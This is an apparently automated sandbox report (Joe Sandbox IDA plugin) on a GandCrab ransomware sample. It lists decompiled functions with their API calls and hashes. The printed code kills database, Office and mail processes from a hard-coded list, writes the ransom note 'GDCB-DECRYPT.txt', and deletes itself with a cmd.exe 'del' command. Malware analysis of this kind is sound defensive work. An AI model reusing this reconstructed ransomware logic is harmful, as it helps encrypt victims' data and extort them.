Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$crab$fabian wosar <3$gand$n
API String ID: 2709691373-4182624408
Opcode ID: 72652b53b2996df2613be322f1fb3ce0905ae6a678b7f426b36688c18a6363a9
Instruction ID: ae293a2a152ec464ad72bd2468a2f1191b9afd2da71f737a5715e6998e9f3bc1
Opcode Fuzzy Hash: 72652b53b2996df2613be322f1fb3ce0905ae6a678b7f426b36688c18a6363a9
Instruction Fuzzy Hash: 9931D471E00309ABDB108FAAAC99BEFBBB8EB48715F100199F655B7281D6741A018FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7140 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBC7140(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x0fbc7140
0x0fbc7148
0x0fbc714a
0x0fbc714e
0x0fbc7153
0x0fbc7161
0x0fbc7164
0x0fbc7169
0x0fbc7169
0x0fbc716f
0x0fbc7179
0x0fbc7180
0x0fbc7184
0x0fbc7187
0x0fbc7187
0x0fbc718d
0x0fbc719b
0x0fbc719d
0x0fbc71a5
0x0fbc71a8
0x0fbc71a8
0x0fbc71ae
0x0fbc71bc
0x0fbc71be
0x0fbc71c6
0x0fbc71c9
0x0fbc71c9
0x0fbc71cf
0x0fbc71dd
0x0fbc71df
0x0fbc71e7
0x0fbc71ea
0x0fbc71ea
0x0fbc71f0
0x0fbc71fe
0x0fbc7200
0x0fbc7208
0x0fbc720b
0x0fbc720b
0x0fbc7211
0x0fbc721f
0x0fbc7221
0x0fbc7229
0x0fbc722c
0x0fbc722c
0x0fbc7232
0x0fbc7240
0x0fbc7242
0x0fbc724a
0x0fbc724d
0x0fbc724d
0x0fbc7253
0x0fbc7255
0x0fbc7255
0x0fbc725c
0x0fbc726a
0x0fbc726c
0x0fbc7274
0x0fbc7277
0x0fbc7277
0x0fbc7280
0x0fbc72ac
0x0fbc7282
0x0fbc7288
0x0fbc72a6
0x0fbc72a6

APIs

lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7192
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC719D
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71B3
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71BE
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71D4
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71DF
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71F5
lstrlenW.KERNEL32(0FBC4966,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7200
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7216
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7221
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7237
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7242
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7261
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC726C
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7288
lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7296

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: c0321e2815f34648a6c0bb65bc254bd90ace8e502634ac4fda62af27c8ef77cb
Instruction ID: dcc2b4d1339ea8e8f2895594ec1a2ddff0306602c99b7df4b17ce356b3a3ad48
Opcode Fuzzy Hash: c0321e2815f34648a6c0bb65bc254bd90ace8e502634ac4fda62af27c8ef77cb
Instruction Fuzzy Hash: 30414E32100616EFC7115FA9FD9C786B7A6FF08366B090578E40283661D734A475DFC4

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC46F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0FBC46F0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				int _t51;
				int _t52;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t70 = CreateToolhelp32Snapshot(2, 0);
				_v172 = _t70;
				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70);
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000);
				}
				return CloseHandle(_t72);
			}

0x0fbc46f6
0x0fbc4703
0x0fbc470b
0x0fbc4713
0x0fbc471b
0x0fbc4723
0x0fbc472b
0x0fbc4733
0x0fbc473b
0x0fbc4743
0x0fbc474b
0x0fbc4753
0x0fbc475b
0x0fbc4763
0x0fbc476b
0x0fbc4773
0x0fbc477b
0x0fbc4783
0x0fbc478b
0x0fbc4793
0x0fbc479b
0x0fbc47a3
0x0fbc47ab
0x0fbc47b3
0x0fbc47bb
0x0fbc47c3
0x0fbc47cb
0x0fbc47d3
0x0fbc47de
0x0fbc47e9
0x0fbc47f4
0x0fbc47ff
0x0fbc480a
0x0fbc4815
0x0fbc4820
0x0fbc482b
0x0fbc4836
0x0fbc4841
0x0fbc484c
0x0fbc4857
0x0fbc4874
0x0fbc4878
0x0fbc4882
0x0fbc4886
0x0fbc4888
0x0fbc4891
0x0fbc4893
0x0fbc4895
0x0fbc4895
0x0fbc4891
0x0fbc48a1
0x0fbc48a1
0x0fbc48a4
0x0fbc48a4
0x0fbc48b0
0x0fbc48b5
0x0fbc48bd
0x0fbc48cb
0x0fbc48cf
0x0fbc48d4
0x0fbc48e1
0x0fbc48e1
0x0fbc48cf
0x0fbc48eb
0x0fbc48ec
0x0fbc48ec
0x0fbc48ef
0x0fbc48f4
0x0fbc48fa
0x0fbc4900
0x0fbc4900
0x0fbc4903
0x0fbc4909
0x0fbc4913
0x0fbc4913
0x0fbc4922

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0FBC4862
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0FBC487C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FBC4895
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FBC48B5
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FBC48C5
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FBC48D4
CloseHandle.KERNEL32(00000000), ref: 0FBC48E1
Process32NextW.KERNEL32(?,00000000), ref: 0FBC48FA
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC4913
CloseHandle.KERNEL32(?), ref: 0FBC491A

Strings

i)w, xrefs: 0FBC48B5

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: i)w
API String ID: 3586910739-1280834553
Opcode ID: 26e84defbfca5bf213ec689cf3ef5b5ecd3dfb4281698308e26cca04f201ac54
Instruction ID: f2a6f44afe90fd939071052b7475a56d14e02975904185e4cfaa34c634640535
Opcode Fuzzy Hash: 26e84defbfca5bf213ec689cf3ef5b5ecd3dfb4281698308e26cca04f201ac54
Instruction Fuzzy Hash: E0516DB6104380DFD7208F16B85876BBBEAFB86718F5049DCE5985B252C7708909CFE6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC53A0 Relevance: 18.1, APIs: 12, Instructions: 92
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC53A0(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}

0x0fbc53b7
0x0fbc53bf
0x0fbc53c9
0x0fbc53cc
0x0fbc53eb
0x0fbc53ed
0x0fbc53f3
0x0fbc5404
0x0fbc540a
0x0fbc540f
0x0fbc541a
0x0fbc5420
0x0fbc5425
0x0fbc5427
0x0fbc5427
0x0fbc542b
0x0fbc542e
0x0fbc5435
0x0fbc5437
0x0fbc5442
0x0fbc5444
0x0fbc5446
0x0fbc5449
0x0fbc5453
0x0fbc544b
0x0fbc544b
0x0fbc544d
0x0fbc544e
0x0fbc544e
0x0fbc5458
0x0fbc5459
0x0fbc545f
0x0fbc5464
0x0fbc5446
0x0fbc546b
0x0fbc5471
0x0fbc5474
0x0fbc5474
0x0fbc547a
0x0fbc547a
0x0fbc5481
0x0fbc5481
0x0fbc549b

APIs

VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,772D81D0,00000000,?,?,?,?,0FBC55B2), ref: 0FBC53B9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0FBC55B2), ref: 0FBC53CC
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,0FBC55B2), ref: 0FBC53E5
CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,0FBC55B2), ref: 0FBC5404
MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,0FBC55B2), ref: 0FBC541A
lstrlenW.KERNEL32(?,?,?,?,?,0FBC55B2), ref: 0FBC542E
lstrlenA.KERNEL32(0000004E,?,?,?,?,0FBC55B2), ref: 0FBC543A
lstrlenA.KERNEL32(0000004E,?,?,?,?,0FBC55B2), ref: 0FBC5459
UnmapViewOfFile.KERNEL32(?,?,?,?,?,0FBC55B2), ref: 0FBC546B
CloseHandle.KERNEL32(?,?,?,?,?,0FBC55B2), ref: 0FBC547A
CloseHandle.KERNEL32(00000000,?,?,?,?,0FBC55B2), ref: 0FBC5481
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0FBC55B2), ref: 0FBC548F

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
String ID:
API String ID: 869890170-0
Opcode ID: b35a98a84c646ad0f0e9210e6d47d112f6a3258dca9412bb2b634cc4396dd860
Instruction ID: 69541e6c4ecbddbdfa74e05b8714b08604339168c68f28e49f43697fc666e501
Opcode Fuzzy Hash: b35a98a84c646ad0f0e9210e6d47d112f6a3258dca9412bb2b634cc4396dd860
Instruction Fuzzy Hash: 1C318170640319BBE7205BA59C5AF9B7B6CEB0AB12F144194F741BB1C1C6B8A5128FE8

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC6BE0(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xfbd2a64; // 0x1f2000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xfbd2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0fbc6bfb
0x0fbc6c03
0x0fbc6c25
0x0fbc6c2a
0x0fbc6c3e
0x0fbc6c45
0x0fbc6c5e
0x0fbc6c5e
0x0fbc6c65
0x0fbc6c6b
0x0fbc6c2c
0x0fbc6c39
0x0fbc6c39
0x0fbc6c78
0x0fbc6c86

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FBC6CC2,00000000,?,?), ref: 0FBC6BF5
wsprintfW.USER32 ref: 0FBC6C03
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FBC6C1F
GetLastError.KERNEL32(?,?), ref: 0FBC6C2C
lstrlenW.KERNEL32(001F2000,?,00000000,?,?), ref: 0FBC6C4E
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0FBC6C5E
CloseHandle.KERNEL32(00000000,?,?), ref: 0FBC6C65
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBC6C78

Strings

%s\GDCB-DECRYPT.txt, xrefs: 0FBC6BFD

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\GDCB-DECRYPT.txt
API String ID: 2985722263-4054134092
Opcode ID: d5bbbb2d1cc34c0eacbe9c7032e5c49b87d81c1d8d2ae1ee3cb1a4e1782c922c
Instruction ID: 0c4e4fffe07202efd82e9e9f75c6daa51f6cf4019098034842d248a142945f70
Opcode Fuzzy Hash: d5bbbb2d1cc34c0eacbe9c7032e5c49b87d81c1d8d2ae1ee3cb1a4e1782c922c
Instruction Fuzzy Hash: 130192713403047BE3201766AD9AF6B3B6DDB4AF67F100194FB05A61C1D6A869228EE9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC5190 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC5190() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0fbc51b6
0x0fbc51ba
0x0fbc51be
0x0fbc51c8
0x0fbc51d0
0x0fbc51d9
0x0fbc51f3
0x0fbc51f3
0x0fbc51d0
0x0fbc51fb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FBC5392,00000000), ref: 0FBC51A6
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBC51B8
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0FBC51C8
wsprintfW.USER32 ref: 0FBC51D9
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FBC51F3
ExitProcess.KERNEL32 ref: 0FBC51FB

Strings

/c timeout -c 5 & del "%s" /f /q, xrefs: 0FBC51D3
open, xrefs: 0FBC51EC
cmd.exe, xrefs: 0FBC51E7

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 9de87f3fb0751eff1f74e8e8ddb7b1f393d011f1db69193973e745094e70ee1e
Instruction ID: 433f79e27c897fc97c2bfc938c8bc12f169277bc67fde88279e0c371dc6a4a3e
Opcode Fuzzy Hash: 9de87f3fb0751eff1f74e8e8ddb7b1f393d011f1db69193973e745094e70ee1e
Instruction Fuzzy Hash: 5DF01C717C131477F23116662C2FF172D2C9B4AF26F290188B704BF1C289E464118EE9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBC2C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xfbcf290; // 0x21
				asm("movdqu xmm0, [0xfbcf280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0FBC2AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x0fbc2c59
0x0fbc2c5e
0x0fbc2c66
0x0fbc2c69
0x0fbc2c70
0x0fbc2c76
0x0fbc2c79
0x0fbc2ce9
0x0fbc2cf2
0x0fbc2d01
0x0fbc2c7b
0x0fbc2c7e
0x0fbc2c9f
0x0fbc2cbd
0x0fbc2ccb
0x0fbc2cd7
0x0fbc2c80
0x0fbc2c94
0x0fbc2c94
0x0fbc2c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0FBC2C8A
BeginPaint.USER32(?,?), ref: 0FBC2C9F
lstrlenW.KERNEL32(?), ref: 0FBC2CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0FBC2CBD
EndPaint.USER32(?,?), ref: 0FBC2CCB
CreateThread.KERNEL32(00000000,00000000,Function_00002AD0,00000000,00000000,00000000), ref: 0FBC2CE9
DestroyWindow.USER32(?), ref: 0FBC2CF2

Strings

GandCrab!, xrefs: 0FBC2C5E

Memory Dump Source

Source File: 00000009.00000002.293108721.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000009.00000002.293102510.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293144665.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293155621.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000009.00000002.293163225.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: 8217c52b7df5c6fc0c02e62570d726a4e7a466420ec1ae4a86d8147b3f1c7347
Instruction ID: 7a036a22db281b1de9ce74273ebe5c2ae8c3c4123e3b6392088b0269ce752f56
